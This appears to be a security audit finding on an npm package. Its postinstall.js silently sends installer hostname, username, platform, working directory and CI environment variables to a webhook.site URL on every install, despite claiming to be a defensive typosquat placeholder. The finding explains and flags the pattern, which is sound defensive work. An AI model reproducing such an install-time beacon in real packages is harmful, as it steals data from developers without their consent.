On npm install, postinstall.js collects the installer's hostname, username, platform, current working directory, and CI-related environment variables, then sends them via HTTPS GET to https://webhook.site/18dc4281-d366-438a-9186-76fbcd56ade5 (postinstall.js line 18). Errors are silenced so the beacon runs invisibly during install. Although package.json describes itself as a 'defensive' typosquat placeholder for the @getd/* scope, installer-side identifiers leave the machine unconditionally without consent on every install, which is unauthorized data collection regardless of stated intent. The combination of a typosquat-shaped name and an automatic install-time phone-home is the standard namespace-abuse exfil pattern.